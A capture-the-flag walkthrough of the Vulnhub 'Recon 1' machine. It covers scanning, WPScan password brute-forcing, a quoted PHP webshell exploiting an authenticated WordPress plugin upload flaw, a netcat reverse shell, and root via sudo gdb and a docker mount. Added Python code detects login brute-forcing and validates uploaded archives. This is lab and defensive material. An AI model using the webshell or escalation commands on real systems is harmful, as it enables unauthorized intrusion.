
Vulnhub: Recon 1 Machine Detailed Walkthrough

Date: 2023-03-17 11:47:42

Recon 1

Author: jason huawen

Target Information

Name: recon: 1

Address:

https://www.vulnhub.com/entry/recon-1,438/

Identifying the Target Host IP Address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:f7:86:46      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.220  08:00:27:23:fc:ec      1      60  PCS Systemtechnik GmbH                                                   


Using the netdiscover tool on Kali Linux, the target host's IP address is identified as 192.168.56.220.

NMAP Scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.220 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-16 21:52 EDT
Nmap scan report for localhost (192.168.56.220)
Host is up (0.00022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 93:0b:57:ce:cb:d5:2b:c5:e6:48:dc:ed:89:6c:51:44 (RSA)
|   256 64:26:e5:bd:85:e9:f8:29:d9:bd:ed:2f:ca:a5:f7:0a (ECDSA)
|_  256 5e:41:4c:19:e2:3c:c4:68:13:0c:5f:6f:f8:71:e6:1b (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: WordPress 5.3.2
|_http-title: recon – Just another WordPress site
MAC Address: 08:00:27:23:FC:EC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.67 seconds

The NMAP scan shows that the target host has 2 open ports: 22 (ssh) and 80 (http).

Getting a Shell

Visiting port 80 in a browser, the returned page shows that the target host runs a WordPress site.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ curl http://192.168.56.220/robots.txt                      
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.220 Port 80</address>
</body></html>
                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ nikto -h http://192.168.56.220       
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.220
+ Target Hostname:    192.168.56.220
+ Target Port:        80
+ Start Time:         2023-03-16 21:55:56 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.56.220/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2023-03-16 21:57:07 (GMT-4) (71 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ gobuster dir -u http://192.168.56.220 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.220
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              sh,php,html,txt,js
[+] Timeout:                 10s
===============================================================
2023/03/16 21:57:43 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 301) [Size: 0] [--> http://192.168.56.220/]
/wp-content           (Status: 301) [Size: 321] [--> http://192.168.56.220/wp-content/]
/wp-login.php         (Status: 200) [Size: 4815]
/license.txt          (Status: 200) [Size: 19935]
/wp-includes          (Status: 301) [Size: 322] [--> http://192.168.56.220/wp-includes/]
/readme.html          (Status: 200) [Size: 7368]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-admin             (Status: 301) [Size: 319] [--> http://192.168.56.220/wp-admin/]
/xmlrpc.php           (Status: 405) [Size: 42]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://192.168.56.220/wp-login.php?action=register]
/server-status        (Status: 403) [Size: 279]
Progress: 1322063 / 1323366 (99.90%)
===============================================================
2023/03/16 22:02:19 Finished
===============================================================

The directory scan did not yield any more valuable information.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ wpscan --url http://192.168.56.220 -e u,p                   
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.220/ [192.168.56.220]
[+] Started: Thu Mar 16 22:02:46 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.220/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.220/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.220/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.220/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.220/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
 |  - http://192.168.56.220/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://192.168.56.220/wp-content/themes/twentytwenty/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://192.168.56.220/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 2.1
 | Style URL: http://192.168.56.220/wp-content/themes/twentytwenty/style.css?ver=1.1
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.220/wp-content/themes/twentytwenty/style.css?ver=1.1, Match: 'Version: 1.1'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] recon
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.220/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] reconauthor
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Mar 16 22:02:55 2023
[+] Requests Done: 55
[+] Cached Requests: 6
[+] Data Sent: 13.911 KB
[+] Data Received: 405.11 KB
[+] Memory used: 240.016 MB
[+] Elapsed time: 00:00:08

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ wpscan --url http://192.168.56.220 -U recon -P /usr/share/wordlists/rockyou.txt

The password-cracking attempt failed (it ran for 16 minutes).

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ wpscan --url http://192.168.56.220 --plugins-detection mixed
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.220/ [192.168.56.220]
[+] Started: Thu Mar 16 22:22:31 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.220/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.220/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.220/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.220/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.220/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
 |  - http://192.168.56.220/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://192.168.56.220/wp-content/themes/twentytwenty/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://192.168.56.220/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 2.1
 | Style URL: http://192.168.56.220/wp-content/themes/twentytwenty/style.css?ver=1.1
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.220/wp-content/themes/twentytwenty/style.css?ver=1.1, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:06:23 <=======================================> (101765 / 101765) 100.00% Time: 00:06:23
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.56.220/wp-content/plugins/akismet/
 | Last Updated: 2022-12-01T17:18:00.000Z
 | Readme: http://192.168.56.220/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.0.2
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.220/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.1.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.220/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.56.220/wp-content/plugins/akismet/readme.txt

[+] insert-or-embed-articulate-content-into-wordpress
 | Location: http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/
 | Last Updated: 2022-11-27T22:41:00.000Z
 | Readme: http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/readme.txt
 | [!] The version is out of date, the latest version is 4.3000000017
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/, status: 200
 |
 | Version: 4.2995 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Mar 16 22:29:30 2023
[+] Requests Done: 101943
[+] Cached Requests: 9
[+] Data Sent: 27.265 MB
[+] Data Received: 13.981 MB
[+] Memory used: 489.078 MB
[+] Elapsed time: 00:06:58

The plugin insert-or-embed-articulate-content-into-wordpress was identified, and it has a known vulnerability:

https://www.exploit-db.com/exploits/46981#:~:text=%23%20Exploit%20Title%3A%20Authenticated%20code%20execution%20in%20%60insert-or-embed-articulate-content-into-wordpress%60,PHP%205.6%20%23%20CVE%20%3A%20-%20%23%23%201.

However, this is an authenticated vulnerability,

so the password still has to be cracked first.

Next, try to crack the other user's password.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ wpscan --url http://192.168.56.220 -U reconauthor -P /usr/share/wordlists/rockyou.txt
[!] Valid Combinations Found:
 | Username: reconauthor, Password: football7
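From the server's side, both wpscan password runs above (the 16-minute failure against recon and the success against reconauthor) look the same: a burst of POSTs to the login endpoints from one address. The following is an added detection example, not part of the original writeup: it parses Apache combined-format access log lines, counts POSTs to wp-login.php and xmlrpc.php per source address, and flags any address that exceeds a threshold inside a sliding time window. The log lines, the User-Agent string, the attacking address (192.168.56.146, the Kali box seen in the nc session later) and the threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Endpoints that password-guessing tools such as WPScan POST to. A failed
# wp-login.php attempt returns 200 (the form again), a success 302.
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],
        "status": int(m.group("status")),
    }


def find_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Return {ip: (total_posts, first_ts, last_ts)} for every source that sends
    more than `threshold` POSTs to a login endpoint inside any sliding `window`."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] in LOGIN_PATHS:
            attempts[rec["ip"]].append(rec["ts"])
    hits = {}
    for ip, stamps in attempts.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            # Slide the window start forward until it spans at most `window`.
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 > threshold:
                hits[ip] = (len(stamps), stamps[0], stamps[-1])
                break
    return hits


# Constructed sample: 25 guesses in 25 seconds from the attacking box plus
# ordinary traffic (one feed fetch, one normal login) from another host.
SAMPLE_LOG = [
    f'192.168.56.146 - - [16/Mar/2023:22:05:{i:02d} -0400] '
    f'"POST /wp-login.php HTTP/1.1" 200 4815 "-" "WPScan v3.8.22"'
    for i in range(25)
] + [
    '192.168.56.1 - - [16/Mar/2023:22:05:10 -0400] "GET /index.php/feed/ HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [16/Mar/2023:22:05:40 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for ip, (count, first, last) in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {count} login POSTs between {first:%H:%M:%S} and {last:%H:%M:%S}")
```

Feeding a real access.log works the same way (`find_bruteforce(open("/var/log/apache2/access.log"))`); tune the threshold to the site's normal login rate.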

At this point the plugin vulnerability should be usable. The steps:

# 1. Create a .zip archive with 2 files: index.html, index.php

echo "<html>hello</html>" > index.html
echo "<?php echo system($_GET['cmd']); ?>" > index.php
zip poc.zip index.html index.php 

## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it)
## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;)
## 4. Access the webshell from the URL displayed after upload similar to 

http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami

Following the steps above:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ vim shell.php         
                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ ls -alh
total 40K
drwxr-xr-x  2 kali kali 4.0K Mar 16 23:11 .
drwxr-xr-x 80 kali kali 4.0K Mar 16 21:51 ..
-rw-r--r--  1 kali kali 1.6K Mar 16 22:41 dict
-rw-r--r--  1 kali kali   12 Mar 16 22:54 index.html
-rw-r--r--  1 root root 1.1K Mar 16 21:52 nmap_full_scan
-rwx------  1 kali kali 5.4K Mar 16 23:11 shell.php

                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ zip jason_shell.zip index.html shell.php 
  adding: index.html (stored 0%)
  adding: shell.php (deflated 59%)


/wp-content/uploads/articulate_uploads/jason_shell/index.html

Visit:

http://192.168.56.220/wp-content/uploads/articulate_uploads/jason_shell/shell.php

The reverse shell from the target host was successfully received on Kali Linux.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.220] 45012
Linux hulk-buster 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 08:44:15 up  1:26,  0 users,  load average: 0.00, 0.04, 0.45
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ is
/bin/sh: 1: is: not found
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@hulk-buster:/$ cd /home
cd /home
www-data@hulk-buster:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  4 root          root   4.0K Jan 28  2020 .
drwxr-xr-x 23 root          root   4.0K Jan 28  2020 ..
drwxr-xr-x  3 hacker        hacker 4.0K Jan 28  2020 hacker
drwxr-xr-x  2 offensivehack docker 4.0K Jan 28  2020 offensivehack
www-data@hulk-buster:/home$ cd hacker
cd hacker
www-data@hulk-buster:/home/hacker$ ls -alh
ls -alh
total 28K
drwxr-xr-x 3 hacker hacker 4.0K Jan 28  2020 .
drwxr-xr-x 4 root   root   4.0K Jan 28  2020 ..
-rw------- 1 hacker hacker    8 Jan 28  2020 .bash_history
-rw-r--r-- 1 hacker hacker  220 Jan 28  2020 .bash_logout
-rw-r--r-- 1 hacker hacker 3.7K Jan 28  2020 .bashrc
drwx------ 2 hacker hacker 4.0K Jan 28  2020 .cache
-rw-r--r-- 1 hacker hacker  655 Jan 28  2020 .profile
www-data@hulk-buster:/home/hacker$ cd ..
cd ..
www-data@hulk-buster:/home$ cd offensivehack
cd offensivehack
www-data@hulk-buster:/home/offensivehack$ ls -alh
ls -alh
total 28K
drwxr-xr-x 2 offensivehack docker        4.0K Jan 28  2020 .
drwxr-xr-x 4 root          root          4.0K Jan 28  2020 ..
-rw------- 1 offensivehack offensivehack   72 Jan 28  2020 .bash_history
-rw-r--r-- 1 offensivehack docker         220 Jan 28  2020 .bash_logout
-rw-r--r-- 1 offensivehack docker        3.7K Jan 28  2020 .bashrc
-rw-r--r-- 1 offensivehack docker         655 Jan 28  2020 .profile
-rw-r--r-- 1 root          root            47 Jan 28  2020 user.txt
www-data@hulk-buster:/home/offensivehack$ cat user.txt
cat user.txt
oho!! not finished now.. find root flag.txt !!
www-data@hulk-buster:/home/offensivehack$ 
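The plugin flaw used in this section comes down to unpacking an uploaded archive into a PHP-served directory without inspecting its contents. As an added example (not code from the plugin or from the writeup), this is the pre-extraction check such an upload handler should run: it rejects archives containing server-executable file types (including double extensions and .htaccess), path-traversal or absolute entries, symlinks, and oversized contents. The sample archives are constructed in memory; the PHP entry holds only a placeholder comment.

```python
import io
import posixpath
import stat
import zipfile

# File types the web server will hand to the PHP interpreter (or that change its
# behaviour) if they are written anywhere under the document root.
SERVER_EXECUTABLE = {
    ".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps", ".inc",
    ".htaccess",
}


def entry_problems(info):
    """Reasons a single ZipInfo must not be extracted under the web root."""
    reasons = []
    name = info.filename
    norm = posixpath.normpath(name)
    # Absolute paths and ".." components would land the file outside the target dir.
    if name.startswith("/") or norm.startswith("..") or "/../" in "/" + name:
        reasons.append("path escapes the extraction directory")
    # Check every extension component so "shell.php.jpg" and ".htaccess" are caught.
    base = posixpath.basename(norm).lower()
    if any("." + part in SERVER_EXECUTABLE for part in base.split(".")[1:]):
        reasons.append(f"server-executable file type: {base}")
    # A symlink entry resolves to an arbitrary path on disk after extraction.
    if stat.S_ISLNK(info.external_attr >> 16):
        reasons.append("symbolic link entry")
    return reasons


def validate_archive(zip_bytes, max_entries=500, max_total=50 * 1024 * 1024):
    """Inspect an uploaded archive before extracting it. Returns {} when the
    archive is acceptable, otherwise {entry_name: [reasons]}; the key "" holds
    archive-level problems (entry count, decompression-bomb size)."""
    problems = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        infos = zf.infolist()
        if len(infos) > max_entries:
            problems.setdefault("", []).append(f"too many entries ({len(infos)})")
        total = sum(i.file_size for i in infos)
        if total > max_total:
            problems.setdefault("", []).append(f"uncompressed size {total} over limit")
        for info in infos:
            reasons = entry_problems(info)
            if reasons:
                problems[info.filename] = reasons
    return problems


def build_zip(files):
    """Build an in-memory archive from {name: bytes} (used for the samples below)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples: the shape of the PoC archive (an HTML file next to a PHP
# file, with a harmless placeholder body), a legitimate static export, and an
# archive using a traversal path.
POC_SHAPED = build_zip({"index.html": b"<html>hello</html>",
                        "index.php": b"<?php /* placeholder */ ?>"})
BENIGN = build_zip({"index.html": b"<html>course</html>",
                    "story.js": b"// player code", "data/frame.json": b"{}"})
TRAVERSAL = build_zip({"../../evil.txt": b"x"})

if __name__ == "__main__":
    for label, blob in (("poc", POC_SHAPED), ("benign", BENIGN), ("traversal", TRAVERSAL)):
        verdict = validate_archive(blob)
        print(label, "REJECT" if verdict else "accept", verdict)
```

The content check is one half of the fix; the other half is server configuration that refuses to execute scripts under the uploads tree at all, so that a filter bypass still does not yield code execution.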

Privilege Escalation

www-data@hulk-buster:/home/offensivehack$ sudo -l
sudo -l
Matching Defaults entries for www-data on hulk-buster:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on hulk-buster:
    (offensivehack) NOPASSWD: /usr/bin/gdb
www-data@hulk-buster:/home/offensivehack$ sudo -u offensivehack /usr/bin/gdb -nx -ex '!sh' -ex quit
<offensivehack$ sudo -u offensivehack /usr/bin/gdb -nx -ex '!sh' -ex quit    
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
$ id
id
uid=1001(offensivehack) gid=119(docker) groups=119(docker)

Switched to the offensivehack user.

$ id
id
uid=1001(offensivehack) gid=119(docker) groups=119(docker)
$ docker images
docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
ubuntu              latest              ccc6e87d482b        3 years ago         64.2MB
$ docker run -it -v /:/mnt ubuntu
docker run -it -v /:/mnt ubuntu

Docker can be used to escalate privileges.

root@d5bd00c86145:/mnt/root# cat flag.txt
cat flag.txt
   _____                 _        _       _        _   _   _                                                                                     
  / ____|               | |      | |     | |      | | | | | |                                                                                    
 | |  __  ___   ___   __| |      | | ___ | |__    | | | | | |                                                                                    
 | | |_ |/ _ \ / _ \ / _` |  _   | |/ _ \| '_ \   | | | | | |                                                                                    
 | |__| | (_) | (_) | (_| | | |__| | (_) | |_) |  |_| |_| |_|                                                                                    
  \_____|\___/ \___/ \__,_|  \____/ \___/|_.__/   (_) (_) (_)                                                                                    
              _     _   _             _              __ _                        _       _               _   _     _        _____ _______ ______ 
             | |   | \ | |           | |            / _| |                      | |     (_)             | | | |   (_)      / ____|__   __|  ____|
  _ __   ___ | |_  |  \| | ___   ___ | |__     __ _| |_| |_ ___ _ __   ___  ___ | |_   ___ _ __   __ _  | |_| |__  _ ___  | |       | |  | |__   
 | '_ \ / _ \| __| | . ` |/ _ \ / _ \| '_ \   / _` |  _| __/ _ \ '__| / __|/ _ \| \ \ / / | '_ \ / _` | | __| '_ \| / __| | |       | |  |  __|  
 | | | | (_) | |_  | |\  | (_) | (_) | |_) | | (_| | | | ||  __/ |    \__ \ (_) | |\ V /| | | | | (_| | | |_| | | | \__ \ | |____   | |  | |     
